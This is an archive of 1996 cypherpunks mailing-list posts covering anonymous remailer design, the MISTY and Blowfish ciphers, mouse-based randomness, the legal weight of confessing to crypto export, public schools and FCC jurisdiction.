From dsmith at prairienet.org Fri Sep 27 22:34:39 1996 From: dsmith at prairienet.org (David E. Smith) Date: Sat, 28 Sep 1996 13:34:39 +0800 Subject: Newsgroup proposal: misc.anonymous Message-ID: <199609280340.WAA00202@bluestem.prairienet.org> -----BEGIN PGP SIGNED MESSAGE----- Mime-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit To: dlv at bwalk.dm.com, cypherpunks at toad.com Date: Fri Sep 27 22:31:14 1996 > "Mark M." writes: > > In an effort to get anonymity and message pools more widespread, I > think it > > would be a good idea to establish a newsgroup for anonymous message > pools tha > > would get the same distribution as any other newsgroup in the "big 8". > The > > "misc" hierarchy is probably the best place for such a newsgroup since > it > > already carries groups like "misc.misc" and "misc.test". Does anyone > have an > > suggestions or objections? > > It should be under misc.activism: misc.activism.anonymity or even > m.a.privacy. This doesn't seem entirely appropriate for a message-pool group, which is what I understood as the original idea. m.a.anonymity would be a great place for a discussion group, though. dave - ----- David E. Smith, P O Box 324, Cape Girardeau MO USA 63702 dsmith at prairienet.org http://www.prairienet.org/~dsmith send mail with subject of "send pgp-key" for my PGP public key "Madness takes its toll . . . please have exact change ready."
From attila at primenet.com Fri Sep 27 22:38:42 1996 From: attila at primenet.com (attila) Date: Sat, 28 Sep 1996 13:38:42 +0800 Subject: Public Schools In-Reply-To: <199609280109.UAA00349@smoke.suba.com> Message-ID: <199609280353.VAA23910@InfoWest.COM>

> There is a solution. Trade Schools,

This is the single most important fact in the U.S. inability to maintain the manufacturing prowess we enjoyed until some poorly defined point in time after WWII!

1. several waves of immigration, most notably Germany after WWI, brought thousands of skilled machinists, &c. many of whom went the trade school route by screening or by socio-economic factors.

2. the U.S. prior to 1920 had an excellent trade school and apprentice program. WWII was the breaking point. the younger generation who survived the war wanted more for their children --hence the college emphasis for _everyone_!

The problem was simple: we have only the now retiring toolmakers who make it all possible. engineering graduates will not observe the manufacturing floors since it is above their dignity to roll up their sleeves. if engineers were required to serve internships in the shops, as doctors are required to intern in a hospital (and the really good ones, the top of the class, choose what I call meat-wagon wards (large city ER and trauma units), the U.S. would be a far healthier and competitive environment. I know, why the meat wagon wards with their pressure and unreasonable hours?
experience, anything and everything comes through those doors every night, and it goes off the scale on the weekends...

is there any reason to send an illiterate to college other than to socialize? is there any reason why the school system can only see a college degree other than for those who they prejudged to be just another generation of welfare mothers and deadbeat dads? why do many with 4 year college degrees only work as entry level secretaries, Burger King night "managers." &c? then what do the rest of them do? join the cradle to the grave dole generation!

> and Parental Involvement. It could very well be (and if I had the money I'd make the bet) that _many_ of the "troubled" youth of today are simply undisciplined.

more the problem that the parents become interested too late, after the child has seen 2,000 murders on TV before the age of 6; walked the streets of parentless daytime; started cocaine at 16, maybe even 10; running for a gang.... then they wail at the funeral: "...it's not fair, johnny was such a good boy... society never gave him a chance...." what they mean is they collect a $100/mo or so less from welfare!

I have raised(ing) 5 children --no TV in the house, and G rated movies occasionally. what did/do the children find to do? read, read, and read. I don't have a problem trying to pry children away from a TV --but I often hear: "...puh-leez, daddy, just let me finish this chapter." No such luck....

> (Fortunately, most of them couldn't afford to bet against their parents in an AP world).

real true...

> It would also seem to follow that if parents were spending their own money (or perceived it as their own money) that they would take a greater interest in their children's education.

...if they were smart enough to start about age 3.
the problem is further exacerbated by the fact the average family expects the state to provide the "enthusiasm" --is there any reason then, to expect other than Hillary's "It's a global village" with her brand of liberal brainwashing of the next generation (all new revisionist history, etc.). Welcome to "Logan's Run!"

fortunately, I have no problem with the public schools. I'm not the only one in the neighborhood without a TV, and the community has trade schools mixed with the high schools, and a two year college to supplement the advanced placement programs. very few families have two parents working. the kids can play outside after dark, and our young women can walk by themselves after dark. (I do admit that one good scream would have an extremely well-armed about to be posse out the door in 15 seconds... --I doubt there would be prisoners!)

a very unusual situation --but I live in rural southern utah where the regional middle school of 1200 can support 4 bands, the top 2 being very impressive, and provide full AP classes, and ACT scores averaging 24-26+ v. the national average of 20 for inbound freshman. and, where an average ward (100-150 families) will have at least a dozen Eagle scouts.

proves your point, I guess...

From stewarts at ix.netcom.com Fri Sep 27 22:45:12 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Sat, 28 Sep 1996 13:45:12 +0800 Subject: Making Remailers Widespread Message-ID: <199609280358.UAA02589@dfw-ix4.ix.netcom.com>

I've been thinking about how to make one-way remailers a widespread commodity, rather than the novelty item they are today. Doing two-way remailers would be better, but that's still a hard problem, and I don't want to widely deploy shoddy two-way-remailers.

Suppose we add form-based remailer support to a popular SSL-equipped HTTP server, such as Apache-SSL, by putting remailer.pl and a remailer form in the default setup, which would deploy hundreds of remailers with minimal effort.
What would we have to do to make it work well, rather than turn into a public relations disaster and spam explosion?

- The remailer script would have to add disclaimers at the beginning and/or end of the message reminding readers that the message is anonymous, and to contact the remailer cabal rather than the postmaster.
- Blocking becomes a big problem - it's annoying enough now, when there are a small number of remailers with hard-working operators; we'd need some sort of automated blocking support to make it usable by relatively non-involved operators
- A centralized block list (e.g. http://www.remailer.net/block.txt) which all of the form-based remailers could load and reference would allow non-picky operators not to have to handle it themselves
- Implementing the blocking list as a web form for people who want to be blocked would make it relatively painless to use; remailer-operators wouldn't have to transcribe email from the remailer-operators list to use it, which helps with other problems.
- Of course, once anybody can fill out their name and ask to be blocked, it's possible for spoofers to block people who don't want to be. One approach for preventing this is to implement a three-way handshake
  - user fills out form, form mails back blocking notice with cookie, user returns cookie to complete blocking
- this is a bit messier for mailing lists, but we can ignore...
- special-case for "postmaster", who may want to block all of foo.domain instead of just postmaster at foo.domain
- special-special-case for postmasters of big sites, e.g. aol, netcom, who we may want to ignore?
- A sender-blocking list is harder, and may still take human attention
- remailer chaining - allow user to put in another Apache-remailer site so we don't have to limit the chaining to known short list of sites. The remailer.pl can send an https foo.bar.com remailer.pl PUT
- The remailer form can probably just have field for second site, if empty don't use.
I suppose remailer.pl could also automagically add that in when it posts. Technical question: - How do we initiate an http or https PUT from a script? I assume there's probably some perl add-in for posting http/https? Is there a command-line-shell interface that can fetch URLs? # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From saken at chardos.connix.com Fri Sep 27 23:07:35 1996 From: saken at chardos.connix.com (Scott Kenney) Date: Sat, 28 Sep 1996 14:07:35 +0800 Subject: Anonymous Mail at US Post In-Reply-To: <32488092.4B8B2A3A@best.com> Message-ID: Greg Kucharo wrote: : : I don't know if anyone else has seen this, but I was mailing letters : in the "out front" boxes the other day when I noticed a sign. The sign : said that all packages 16 ounces or over had to be taken inside for : disposal into the mail slot. The obvious explanation being that even : though you can abstain from marking a return address, the postal : inspectors would like a nice photo of you with your mail. Note that neither the USPS or the Postal inspection service really want anything to do with this crap. This was mandated by the FAA which threatened to stop allowing the mails to be carried on domestic passenger flights. - scott kenney * saken at chardos.connix.com * freebsd hacker * toriphile disgruntled postal worker * aimee-fan From pgut001 at cs.auckland.ac.nz Fri Sep 27 23:26:49 1996 From: pgut001 at cs.auckland.ac.nz (pgut001 at cs.auckland.ac.nz) Date: Sat, 28 Sep 1996 14:26:49 +0800 Subject: Mitsubishi MISTY LSI Message-ID: <84388570628017@cs26.cs.auckland.ac.nz> >Does anyone have a reason not to consider this algorithm snake oil? e.g.: > >Was it developed by a well known cryptographer? >Has it been vetted by someone/some organization with reputation? > >I other words, why should we trust it? 
It was developed by a team lead by Mitsuru Matsui and has been subject to fairly intense analysis, although not by non-Mitsubishi people AFAIK. In any case it's not the usual snake oil. When I last talked to someone from Mitsubishi who was working on Misty I tried to convince them to make details available online, you could try something like www.melco.co.jp to see if there's anything available. Peter. From root at bushing.plastic.crosslink.net Fri Sep 27 23:51:47 1996 From: root at bushing.plastic.crosslink.net (Ben Byer) Date: Sat, 28 Sep 1996 14:51:47 +0800 Subject: Public Schools In-Reply-To: Message-ID: <199609280512.BAA02469@bushing.plastic.crosslink.net> > > On Fri, 27 Sep 1996, ronsimpson wrote: > > > I hate to burst any bubbles but, the school with the highest number of > > National Merit Finalists and highest number of 1600 SATs is a Public > > High School (Jefferson High in Fairfax, VA) > > > > Yeah, Fairfax has good schools. But you're misrepresenting the truth: > what school has the highest *percentage* of 1600 SATers, etc. > > I suspect Jefferson High is larger than most private schools. It's kind of funny to me to see Jefferson being discussed like this, speaking as a student of it. :) Actually, it's not all that big a school, thanks to the magic of controlled admissions, with 1600 students for 4 grades. This may be a larger number than many private schools, but it is half the size of many of the other public schools. Jefferson probably has one of the highest percentages in the country, if only because you have to pass a rigorous standardized test just to get accepted to it. -- Ben Byer root at bushing.plastic.crosslink.net I am not a bushing From tcmay at got.net Sat Sep 28 00:01:20 1996 From: tcmay at got.net (Timothy C. 
May) Date: Sat, 28 Sep 1996 15:01:20 +0800 Subject: Public Schools In-Reply-To: <199609280109.UAA00349@smoke.suba.com> Message-ID: At 3:02 AM +0000 9/28/96, attila wrote: > a very unusual situation --but I live in rural southern utah > where the regional middle school of 1200 can support 4 bands, the > top 2 being very impressive, and provide full AP classes, and ACT Wow! Utah is teaching AP? Is Jim Bell being brought in as a Special Lecturer? (I knew Idaho has special Militia classes, but to hear that Utah is now teaching Assassination Politics is pretty impressive.) --Tim We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From wa6ube at ix15.ix.netcom.com Sat Sep 28 00:14:49 1996 From: wa6ube at ix15.ix.netcom.com (Patricia Gibbons) Date: Sat, 28 Sep 1996 15:14:49 +0800 Subject: [CRYPTO] (was: sig/noise ratio) In-Reply-To: <199609271930.MAA04776@well.com> Message-ID: <324CBFD1.6BCB@popd.ix.netcom.com> Brian D Williams wrote: > > In the interest of those who wish a significant increase in the > signal/noise ratio I make a proposal. Significant crypto related > posts could be prefaced with [CRYPTO] on the subject line on a > strictly volunteer basis, that way those desiring a more topical > list could have one simply by setting the appropriate filter. > > Items crypto related but missing the [CRYPTO] header could be > reposted by well meaning souls. > > Other appropriate headers could of course be used. > > Brian I will be the first on my block to 2nd this excellent idea! 
-- Trish, WA6UBE at ix.netcom.com "The Vertical Skywave Girl" ... Mobile repair shop supervisor - City of San Jose/ ITD-Communications PGP Keyserver Webpage: < http://bs.mit.edu:8001/pks-toplev.html > From gbroiles at netbox.com Sat Sep 28 03:11:59 1996 From: gbroiles at netbox.com (Greg Broiles) Date: Sat, 28 Sep 1996 18:11:59 +0800 Subject: "Confessing to a felony" Message-ID: <3.0b19.32.19960928013142.0069aa3c@ricochet.net> At 06:30 PM 9/27/96 -0800, Tim May wrote: > >Hearing me say I "exported crypto," a hearsay claim, and happening to find >one or more laptops at my home, weeks or months later, implies nothing. >Legal proof is still needed. Given only a nebulous statement like "I >exported crypto in violation of the ITARs," or "I shipped PGP to Europe," >is not enough for a case even to be brought to trial. > >(If it reached trial, I would expect a defense attorney to move for >dismissal. Absent any evidence that a crime occurred, absent any proof >beyond the nebulous hearsay statement of a "braggart," there is simply no >basis for criminal action.) > >"Stupid bragging criminals" may be common, but bragging is not in and of >itself illegal. There still has to be evidence of a crime. > >"Produce the body." I mostly agree re the "corpus delicti" rule (a confession must be corroborated by independent evidence that a crime has been committed, common law federally, statutory in Oregon (ORS 136.425(1)) but disagree with your use of "hearsay" - statements of a defendant in a criminal proceeding are not hearsay because they're the statements of a party opponent. (In federal court and in Oregon, anyway - in California they're hearsay but admissible as an exception. FRE 801(d)(2), ORE 801(4)(b), Cal Evid Code 1220.) This quote from _US v. 
Singleterry_ (CA1, 1994) (sorry no F2 cite, found it on a net database of slip opinions) does a nice job of addressing the question at hand: "To begin with, we note that a defendant's own statements are never considered to be hearsay when offered by the government; they are treated as admissions, competent as evidence of guilt without any special guarantee of their trustworthiness. See Fed. R. Evid. 801(d)(2) & advisory committee's note; see also United States v. Barletta, 652 F.2d 218, 219 (1st Cir. 1981). Nevertheless, there is a danger that the jury will rush to credit a confession without seriously considering whether the defendant confessed to a crime he did not commit. As a result, the federal courts have adopted common law rules designed to prevent a jury from convicting the defendant solely on the basis of an untrustworthy confession. The general rule is that a jury cannot rely on an extrajudicial, post-offense confession, even when voluntary, in the absence of "substantial independent evidence which would tend to establish the trustworthiness of [the] statement." Opper v. United States, 348 U.S. 84, 93 (1954). See also Smith v. United States, 348 U.S. 147 (1954); Warszower v. United States, 312 U.S. 342 (1941); United States v. O'Connell, 703 F.2d 645 (1st Cir. 1983). The Court has explained that independent proof of the commission of the charged offense is not the only means of establishing the trustworthiness of the defendant's confession; another "available mode of corroboration is for the independent evidence to bolster the confession itself and thereby prove the offense `through' the statements of the accused." Smith, 348 U.S. at 156." (footnotes omitted) I think the question of what *would* constitute the corpus delicti is interesting; the mere presence of PGP overseas shouldn't be enough. 
And evidence like PGP's presence on a laptop which had once been overseas, or airline ticket stubs or passport stamps or testimony from a security officer who remembered making the defendant turn on the laptop at the metal detector, or even surveillance camera footage would corroborate the defendant's confession but not establish that a crime was committed. Such evidence would seem to get us closer to the latter test mentioned in _Singleterry_ but wouldn't meet Oregon's test of "some other proof that the crime has been committed" (ORS 136.425) nor California's "the charged crime actually happened" (People v. Jennings (1991) 53 Cal.3d 334, 368) standard. But an ITAR prosecution would occur in Federal court, where evidence which merely corroborates the confession (instead of proving a crime) may be sufficient. (And, of course, this is all just so much jawboning. Not legal advice. I'm inclined to avoid confessing to crimes via the Internet whether or not it seems likely to lead to prosecution or conviction. I've already been to one job interview where the employer had seen (and was unnerved) by my vocal presence on the net.(!?!) Which is OK with me because if I make someone nervous when they read Alta Vista, just wait until they meet me. :) It's time to get used to the idea that whatever we write may come back in 20 or 30 or 40 years, whether we like it or not. I think it'll teach us both a sense of forgiveness and a sense of discretion, but that may take awhile.) -- Greg Broiles | "We pretend to be their friends, gbroiles at netbox.com | but they fuck with our heads." http://www.io.com/~gbroiles | | From attila at primenet.com Sat Sep 28 04:31:18 1996 From: attila at primenet.com (attila) Date: Sat, 28 Sep 1996 19:31:18 +0800 Subject: Public Schools In-Reply-To: Message-ID: <199609280943.DAA28475@InfoWest.COM> In , on 09/27/96 at 10:36 PM, "Timothy C. 
May" said: At 3:02 AM +0000 9/28/96, attila wrote: > a very unusual situation --but I live in rural southern > utah where the regional middle school of 1200 can support 4 > bands, the top 2 being very impressive, and provide full AP > classes, and ACT Wow! Utah is teaching AP? Is Jim Bell being brought in as a Special Lecturer?  come on, Tim... you are not that old. AP has three meanings (at least): 1. Associated Press (news gathering) 2. Advanced Placement (as in college credit for HS classes) 3. not widely known: Jim Bell's Assassination Political Inanity. I wonder if Jim Bell would enjoy his stay in Utah's Dixie? there is only one bar in Washington county, and I understand it's pretty limited (if you even find it!). (I knew Idaho has special Militia classes, but to hear that Utah is now teaching Assassination Politics is pretty impressive.) Utah does not need militia classes: 1. opening of deer season (Oct 20) is a state holiday. every- thing shuts down: schools, business, government... we take it real serious.... 2. according to info I scanned from one of those moving target bleeding heart liberals, utahns have more weapons than children, and you know we have a lot of children. 3. if you are aware of Mormon heritage: despite a trail of blood from Kirtland (mild), Missouri (3 times, severe), and Nauvoo (medium), only one incident (in Missouri) found Mormons fighting to defend themselves. In Utah, we endured an occupying U.S. army for almost 50 years while statehood was denied... and our leaders were imprisoned, property and assets confiscated, etc. that's OK, tim; I'm glad you're still feeling your oats in your old age! -- one of the few things we all share: the utter, corrosive contempt for our elected officials. 
From Scottauge at aol.com Sat Sep 28 08:44:20 1996 From: Scottauge at aol.com (Scottauge at aol.com) Date: Sat, 28 Sep 1996 23:44:20 +0800 Subject: Crypto and six yr old sex perverts: Project Electric Potatoes [CRYPTO] Message-ID: <960928093843_295524911@emout08.mail.aol.com> Using crypto may be required to keep ya outta jail, given the guberment has gone so far low as to "route out this six year old sex pervert busy kissing the girls." (Quoted for emphasis.) I wonder when sexual harassment will become a sex offence. Are the red sashed sex cores of Orwell's 1984 around the corner? I wonder if he will need to register with the sheriffs office in any towns he moves into as a sex offender - or has that law not passed yet? Soon I believe our communications will be turned against us - as I am sure I will hear about this one in the future.... Crypto can help us from the all intrusive guberment - it is far to big. Hence a new project for us all: Multicast Crypto referred to as Electric Potatoes as mashed up potatoes are hard to put back together. Purpose: Already we are seeing problems for speech on the internet (see radikal postings - though they are a bit fruity IMHO.) And it sounds like the law in one country is going to be very interested in arresting people in another. Hence, perhaps we need a crypto system (including human procedures and fail safes) for community discussions. Crypto is very much one to one right now, but can we implement a crypto for wide distribution to a very defined set of people? This should be useful in commerce too... like CC of mail to others, etc. Problem Definition Time: Who will be responsible for allowing a member into the community? (And all the other trust issues...) The software to implement the community must be available on multiple platforms like UNIX, Windoze, Macintosh, NeXT, etc. 
How do we over come the problems of storage - should the messages remain encyphered at all times in local storage of a member in case of a knock on the door, requiring the user to use the software to read, write, store, and organize messages. Is it even possible to overcome the human turncoat factor? Can we protect them as well as us from coercian, black mail, seizure, or defection? Is this even possible, because we are looking for the freedom to speak, yet nobody will be able to hear us!!! ********** Method of discussion: Since we will all hopefully have many ideas and comments on this exercise,may I provide a protocal: Please have Project Electric Potatoes in the subject heading - some of us use the delete key quite freely and don't want to accidently remove your valued comments and ideas. Should the message contain a problem definition, please have Problem in the subject. Should the message contain an answer please have Answer in the subject. Should the message contain a rant, please have Rant in the subject. I leave it to the writer to include [CRYPTO] in the header.... Thank You All, and I hope we get a great discussion going on here. From jk at stallion.ee Sat Sep 28 09:34:01 1996 From: jk at stallion.ee (=?ISO-8859-1?Q?J=FCri_Kaljundi?=) Date: Sun, 29 Sep 1996 00:34:01 +0800 Subject: WARNING: This Message Actually Contains a Question Reguarding Crypto! In-Reply-To: <199609241649.LAA22238@mailhub.amaranth.com> Message-ID: Tue, 24 Sep 1996, William H. Geiger III wrote: > I just recently downloaded copies of Blowfish & Ghost. > > Does anyone have any experiance with these two algorithims? > > Does anyone know how they are using Blowfish and why? A program called F-Secure Desktop for Windows 3.x and Windows 95 is using Blowfish with 256-bit keys. It is meant for encrypting the files on your hard disk and it works nicely together with Windows File Manager or Windows95 shell. 
I would say it is one of the best strong and easy to use HD encryption programs (only that it costs $$). It is manufactured by Datafellows, who is also distributing F-Secure SSH. You can download the demo version at http://www.datafellows.com/f-secure/

Why they are using it: may be because it is fast on Intel Pentium and Pentium Pro processors, as discussed in Applied Cryptography?

Jüri Kaljundi AS Stallion jk at stallion.ee

From dlv at bwalk.dm.com Sat Sep 28 10:03:19 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sun, 29 Sep 1996 01:03:19 +0800 Subject: Making Remailers Widespread In-Reply-To: <199609280358.UAA02589@dfw-ix4.ix.netcom.com> Message-ID:

Bill Stewart writes:
...
> Doing two-way remailers would be better, but that's still a hard problem,
> and I don't want to widely deploy shoddy two-way-remailers.

Unfortunately, one-way remailers have much fewer uses than two-way remailers, and many of these uses are abusive.

> - The remailer script would have to add disclaimers at the beginning
> and/or end of the message reminding readers that the message is
> anonymous, and to contact the remailer cabal rather than the postmaster.

Julf's anon.penet.fi used to add a signature with a disclaimer.

> - Blocking becomes a big problem - it's annoying enough now,
> when there are a small number of remailers with hard-working operators;
> we'd need some sort of automated blocking support to make it
> usable by relatively non-involved operators

Yes.

> - A centralized block list (e.g. http://www.remailer.net/block.txt)
> which all of the form-based remailers could load and reference would
> allow non-picky operators not to have to handle it themselves

A single centralized point of failure is bad. Maybe 4 or 5 redundant ones. A blocking request sent to one will be replicated in the other automatically.
> - Implementing the blocking list as a web form for people who > want to be blocked would make it relatively painless to use; > remailer-operators wouldn't have to transcribe email from the > remailer-operators list to use it, which helps with other problems. > > - Of course, once anybody can fill out their name and ask to be > blocked, it's possible for spoofers to block people who don't want to be. > One approach for preventing this is to implement a three-way handshake > - user fills out form, form mails back blocking notice with cookie, > user returns cookie to complete blocking That's the protocol Eric Thomas's listserver uses to make sure mailing list subscription requests aren't spoofed. I think I mentioned it recently on this list in the context of creating a similar blocking list for addresses that don't want to receive unsolicited commercial e-mail. Indeed, if such a system is put up, it could maintain several blocking lists: addresses who don't want any remailer mail addresses who don't want 1-way remailer mail, but are willing to get 2-way remailer mail addresses who don't want unsolicited commercial e-mail (probably a biggie :-) addresses who will only accept PGP-signed e-mail etc. > - this is a bit messier for mailing lists, but we can ignore... We can't quite ignore... In the scheme you've just described, someone can enter a blocking request via a Web page and give a submission request for some mailing list, and the cookie will be e-mailed to the mailing list. > - special-case for "postmaster", who may want to block > all of foo.domain instead of just postmaster at foo.domain > - special-special-case for postmasters of big sites, e.g. aol, netcom > who we may want to ignore? > - A sender-blocking list is harder, and may still take human attention I don't think it's a good idea to suport blocking receivers in an entire domain, like *@aol.com. Just say it's not supported. I don't think it's a good idea to support sender blocking at all. 
Would the receiver blocking list be available to everyone to view? That sounds like a violation of privacy. Someone suggested on this list that (assuming that the entries are addresses that match exactly, not regular expressions), one can store hashes of addresses. Then when a remailer wants to know if a particular address is on the list, it computes the hash and searches for it (binary search is fast). A curious person can check whether a particular address is on the list, but can't obtain the list of all blocked receivers.

--- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

From deviant at pooh-corner.com Sat Sep 28 10:51:36 1996 From: deviant at pooh-corner.com (The Deviant) Date: Sun, 29 Sep 1996 01:51:36 +0800 Subject: Public Schools In-Reply-To: <199609280109.UAA00349@smoke.suba.com> Message-ID:

On Fri, 27 Sep 1996, snow wrote:

> Date: Fri, 27 Sep 1996 20:09:36 -0500 (CDT)
> From: snow
> To: jbugden at smtplink.alis.ca
> Cc: cypherpunks at toad.com
> Subject: Re: Public Schools
>
> James said:
> > ronsimpson at unidial.com wrote:
> > >I hate to burst any bubbles but, the school with the highest number
> > > of National Merit Finalists and highest number of 1600 SATs is a
> > > Public High School (Jefferson High in Fairfax, VA)
> > The same is true for Montreal (Royal Vale) using the equivalent scoring methods.
> > But there are public schools at both extremes of the curve.
> > While it is true that Private Schools would not survive due to market forces if
> > they did consistently poorly, it is also true that they filter their incoming
> > student body in a manner that Public Schools can not.
> > If you want to refuse those who are too stupid or anti-social from Public
> > Schools in order to improve the social or intellectual climate, you better have
> > a solution for the resulting cast-offs.
>
> There is a solution. Trade Schools, and Parental Involvement.
It could > very well be (and if I had the money I'd make the bet) that _many_ of the > "troubled" youth of today are simply undisciplined. (Fortunately, most of > them couldn't afford to bet against their parents in an AP world). It would > also seem to follow that if parents were spending their own money (or > perceived it as their own money) that they would take a greater interest in > their children's education. > > For those that are truly not scholastically oriented, there would be > trade schools. I would also bet that you could teach a child everything they > need to learn (other than a trade) to cope in this world in about 4 years. > But now we must make a distinction... I'm LD in writing, but can read very well (when I was in 6th grade I could read like a 10th grader), and do very well in Math and Computer classes (and non-biological/anatomical sciences). So should I be in trade school, because I plan on being a computer programmer, or go to college? Sure, I don't do well in language and (depending on the class) some history classes, which, IMHO, are weighted more heavily than they should be in both public _and_ private schools (and yes, I've been to both), but I don't think that should mean I can't go to college... Anyway, my point is that there is, at times, a very fine line... --Deviant When we write programs that "learn", it turns out we do and they don't. From deviant at pooh-corner.com Sat Sep 28 10:58:31 1996 From: deviant at pooh-corner.com (The Deviant) Date: Sun, 29 Sep 1996 01:58:31 +0800 Subject: Public Schools In-Reply-To: Message-ID: On Fri, 27 Sep 1996, Timothy C. May wrote: > Date: Fri, 27 Sep 1996 22:36:57 -0800 > From: "Timothy C.
May" > To: cypherpunks at toad.com > Subject: Re: Public Schools > > At 3:02 AM +0000 9/28/96, attila wrote: > > > a very unusual situation --but I live in rural southern utah > > where the regional middle school of 1200 can support 4 bands, the > > top 2 being very impressive, and provide full AP classes, and ACT > > Wow! Utah is teaching AP? Is Jim Bell being brought in as a Special Lecturer? > > (I knew Idaho has special Militia classes, but to hear that Utah is now > teaching Assassination Politics is pretty impressive.) > > --Tim > Umm.. I think he meant AP as in "Advanced Placement", à la college classes in high school. But who knows, maybe you were being sarcastic... --Deviant The first time, it's a KLUDGE! The second, a trick. Later, it's a well-established technique! -- Mike Broido, Intermetrics From jamesd at echeque.com Sat Sep 28 11:15:25 1996 From: jamesd at echeque.com (James A. Donald) Date: Sun, 29 Sep 1996 02:15:25 +0800 Subject: Mousepad RNG's? Message-ID: <199609281551.IAA03203@dns2.noc.best.net> At 08:14 PM 9/27/96 +0200, Anonymous wrote: > I just downloaded a copy of the beta version of Datafellows > Windows 3.1 SSH and it asked to move the mouse around to > generate some randomness. In reading Applied Crypto, it > mentioned that there is no such thing as generating > randomness from a personal computer unless something like > a Geiger counter is used. Is there any way to create a > fairly random sample from the mouse? Should one use lots > of jerky movements, or take ones time with it? In this case the entropy is the negative of the logarithm of the probability that you or someone else could exactly duplicate those mouse movements. I would guess that you get at least three bits a second just doodling around, so half a minute of doodles (a pretty long time) should be unbreakable.
Some time ago, at a cypherpunks conference, people were making all sorts of ridiculous proposals for being really, really, really, sure that you had real entropy, and a prominent cypherpunk, possibly Tim May, said, "This is ridiculous: Nobody ever broke good crypto through weakness in the source of truly random numbers". Sometime after that Netscape was broken through weakness in the source of truly random numbers. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From azur at netcom.com Sat Sep 28 11:17:58 1996 From: azur at netcom.com (Steve Schear) Date: Sun, 29 Sep 1996 02:17:58 +0800 Subject: Basis of FCC Jurisdiction [RANT] Message-ID: Last week I started a thread on the Telecom Regulation list. My intention was to introduce discussion of some circa-1780s Republican questioning, as opposed to the widely accepted Federalist. The most interesting composite result is below: >Date: Sat, 21 Sep 1996 22:08:03 -0500 >Reply-To: telecomreg at relay.doit.wisc.edu >Originator: telecomreg at relay.doit.wisc.edu >Sender: telecomreg at relay.doit.wisc.edu >Precedence: bulk >From: "Michael D. Sullivan" >To: Multiple recipients of list >Subject: Re: Basis of FCC Jurisdiction (Republican rant) >X-Comment: Requests (UNSUBSCRIBE/HELP) to: listserver at relay.doit.wisc.edu >MIME-Version: 1.0 > >Steve Schear wrote: > > >I've been wondering lately about the jurisdictional limits of the FCC > >vis-a-vis the Article(s) of the Constitution from which they derive their > >authority. My understanding is that the FCC is empowered under the Fed's > >interstate commerce clauses. If so, how valid is their jurisdiction over > >low power and/or millimeter wave transmissions.
It seems a case can be > >made that such transmissions represent little or no possibility of > >interstate transmission. > >To which Bob Jacobson replied: > > >The FCC derives its authority by Congressional mandate, so the question is > >rightly posed as "Does Congress have rights to regulate local radio trans- > >missions?" Congress abrocated to itself the right to regulate all radio > >transmissions, on the grounds that any transmission might interfere with > >the transmissions of interstate broadcasters. Generally, this right has > >been upheld by the courts, although states have successfully challenged > >the absolute power of the FCC with regard to certain aspects of non-radio > >transmissions -- for example, telephone calls -- that do not cross state > >boundaries and even some that do. To my knowledge, no form of electronic > >transmission is invulnerable to some type of regulation, whether federal > >or state (including municipal regulation by cities and counties, creatures > >of the states). Of course, there are loopholes, as the Internet has amply > >demonstrated. > >In further response, John Levin added: > > >This discussion is incorrect by omission. The reason that states have > >authority over intrastate telephone service is because Congress says they > >do. The Telecommunications Acts carve out areas of state and federal > >jurisdiction. The FCC, like any other agency, takes an expansive view of > >their authority and courts occasionally rein in such excursions after > >looking at their enabling statutes. The technical doctrine is 'federal > >preemption', and unless Congress expressly preempts the states, or the > >preemption is necessary to effectuate a national policy authorized by > >federal legislation, the states retain control of state activities. As to > >what constitutes 'interstate commerce' for the purposes of the U.S. > >Constitution, there are hundreds, if not thousands of court decisions on > >that topic. 
During most of this century, usually even a very slight > >impact on interstate commerce has been found to be sufficient for Congress > >to legislate. Those of you who plan on using 'states rights' as a basis > >for disobeying Federal laws or regulations should consult an attorney and > >get your affairs in order before you act. > >Although nothing in the Communications Act of 1934 or its predecessor Radio >Acts states so explicitly, it is implicit that the Interstate Commerce Clause >is the basis for the statute and for FCC radio licensing jurisdiction. That >was undoubtedly one of the bases for earlier legislative and Commerce >Department regulation of radio, along with providing for the national >defense. Under the Commerce Clause and the Necessary and Proper Clause, >Congress can assert jurisdiction over virtually anything affecting >interstate commerce. This clearly underlies Section 301 of the >Communications Act, which asserts federal jurisdiction and control over all >interstate radio transmissions and requires FCC licensing for the same. > >The Communications Act does not assert jurisdiction over, or require FCC >licenses for, radio transmissions between two points in a single state (not >including D.C.). In fact, this doesn't remove virtually anything from >federal jurisdiction or licensing as a matter of law, because radio >transmissions don't stop at any particular point, they merely attenuate as >they continue to propagate onward ad infinitum. As a technical matter, a >milliwatt-level millimeter-wave radio transmission from one end of a >steel-encased underground chamber to a receiver at the other end propagates >to points thousands of miles away, albeit at an undetectable level (i.e., >waaaaay below the noise floor), and it therefore could be viewed as an >interstate radio transmission. Practically, however, such transmissions >stop at the steel shielding.
